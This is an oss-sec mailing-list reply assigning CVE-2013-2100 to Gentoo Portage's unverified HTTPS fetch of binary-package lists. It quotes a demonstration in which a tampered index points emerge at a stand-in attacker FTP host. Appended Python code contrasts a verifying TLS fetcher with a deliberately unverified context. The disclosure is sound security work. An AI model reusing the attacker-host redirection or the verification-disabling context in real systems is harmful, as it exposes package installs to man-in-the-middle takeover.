oss-sec mailing list archives
Re: CVE Request: Man in the middle on Gentoo Portage binary package installer
From: Kurt Seifried <kseifried () redhat com>
Date: Wed, 15 May 2013 19:45:39 -0600
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/15/2013 04:46 AM, Jason A. Donenfeld wrote:
> Hi Kurt,
>
> Portage is the package manager of Gentoo Linux. It supports many features, one of which is the ability to synchronize against a remote list of binary packages, and use that list to determine where to fetch such binary packages. One of the fields in this list of packages is URI:
>
> victim # curl -s -k https://portage-build.zx2c4.com/Packages | grep URI:
> URI: ftp://horrible.attacker.somewhere.on.the.internet/blah
> victim # emerge -1 portage-utils
> Calculating dependencies... done!
> Emerging binary (1 of 1) app-portage/portage-utils-0.30 from gentoo
> --2013-05-15 12:33:32-- ftp://horrible.attacker.somewhere.on.the.internet/blah/app-portage/portage-utils-0.30.tbz2
> => ‘/usr/portage/packages/app-portage/portage-utils-0.30.tbz2’
> Resolving horrible.attacker.somewhere.on.the.internet...
>
> Over insecure connections, Portage provides the ability to use HTTPS (in addition to SFTP and SSH), so that this remote list of binary packages is not tampered with. This list of binary packages will be downloaded in the background silently. Unfortunately, Portage does not validate the SSL certificates, leaving this open to a trivial man in the middle attack. An attacker could leverage this man in the middle vector to remotely gain complete control over a victim's machine, since Portage runs with essentially full permissions.
>
> I reported this to the maintainer of Portage in Gentoo Bug #469888 [1], and it was fixed in commit b5969af9f5 [2]. Do note that while this commit solves the immediate problem with fetching /Packages, as detailed above, there may be other additional unconfirmed insecure uses of the vulnerable urlopen() function that have not yet been analyzed or fixed.
>
> Thanks,
> Jason
>
> [1] https://bugs.gentoo.org/show_bug.cgi?id=469888
> [2] http://git.overlays.gentoo.org/gitweb/?p=proj/portage.git;a=commit;h=b5969af9f575e4e4b669f44e76ad01f0dbc2dd27

Yeah SSL with no certificate checks is not so good. Please use CVE-2013-2100 for this issue.

- --
Kurt Seifried
Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
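The following Python is an added illustration of the class of defect discussed in the thread; it is not Portage's code and not the fix in the referenced commit. It shows a fetcher for a Packages-style index that refuses to run unless the SSL context verifies both the certificate chain and the hostname, beside the weak "no verification" configuration for comparison, plus a small parser for the `Key: value` header of such an index. The index text, the `binhost_uri_is_protected` helper and the `opener_fn` injection point are assumptions made for this example, not Portage behaviour.

```python
"""Verified-TLS fetch of a Portage-style Packages index (added example, not Portage code)."""
import ssl
import urllib.request
from urllib.parse import urlparse

# Constructed sample of the top of a binary-package index, modelled on the
# "URI:" header in the report. Not real output from any host.
SAMPLE_PACKAGES_HEADER = """\
ACCEPT_KEYWORDS: amd64
URI: ftp://horrible.attacker.somewhere.on.the.internet/blah
PACKAGES: 1

CPV: app-portage/portage-utils-0.30
"""

# Schemes that give the transfer integrity/authentication; ftp and http do not.
# (Assumption for this example: the page only lists https/sftp/ssh as secure options.)
PROTECTED_SCHEMES = {"https", "sftp", "ssh"}


def parse_header(text):
    """Parse the 'Key: value' header lines of an index, stopping at the first blank line."""
    header = {}
    for line in text.splitlines():
        if not line.strip():
            break
        key, _, value = line.partition(":")
        header[key.strip()] = value.strip()
    return header


def binhost_uri_is_protected(uri):
    """True if the URI the index hands us uses an authenticated transport."""
    return urlparse(uri).scheme.lower() in PROTECTED_SCHEMES


def make_verifying_context():
    """Hardened client context: CA verification and hostname check enabled."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True          # already the default; stated explicitly
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def make_unverified_context():
    """The weak configuration for comparison: any certificate is accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False         # must be cleared before CERT_NONE is allowed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_verifying(ctx):
    """Check the two settings that decide whether a MITM certificate is rejected."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


def fetch_index(url, ctx=None, opener_fn=None):
    """Fetch an index over HTTPS, refusing plaintext schemes and non-verifying contexts.

    opener_fn(url, ctx) -> str is an injection point so the logic can be exercised
    offline; the default uses urllib.request.urlopen with the given context.
    """
    if urlparse(url).scheme.lower() != "https":
        raise ValueError("index must be fetched over https, got %r" % url)
    ctx = ctx if ctx is not None else make_verifying_context()
    if not context_is_verifying(ctx):
        raise ValueError("refusing to fetch with an SSL context that skips verification")
    if opener_fn is None:
        def opener_fn(u, c):
            with urllib.request.urlopen(u, context=c) as resp:
                return resp.read().decode("utf-8", "replace")
    return opener_fn(url, ctx)


def raises_value_error(fn):
    """Small helper so callers can check the refusal paths without a network."""
    try:
        fn()
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    header = parse_header(SAMPLE_PACKAGES_HEADER)
    print("index URI:", header["URI"], "protected:", binhost_uri_is_protected(header["URI"]))
    print("default context verifies:", context_is_verifying(make_verifying_context()))
    print("weak context verifies:", context_is_verifying(make_unverified_context()))
```

The check in `fetch_index` is deliberately placed before any network call: a context that silently accepts any certificate is the condition the report describes, and failing closed on it is cheaper than auditing every caller of `urlopen()` after the fact. The `binhost_uri_is_protected` check is the second half of the same problem, since a verified index that points at an `ftp://` binhost still leaves the package bytes unauthenticated in transit.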
Current thread:
- CVE Request: Man in the middle on Gentoo Portage binary package installer Jason A. Donenfeld (May 15)
- Re: CVE Request: Man in the middle on Gentoo Portage binary package installer Kurt Seifried (May 15)
- Re: CVE Request: Man in the middle on Gentoo Portage binary package installer Pavel Labushev (May 20)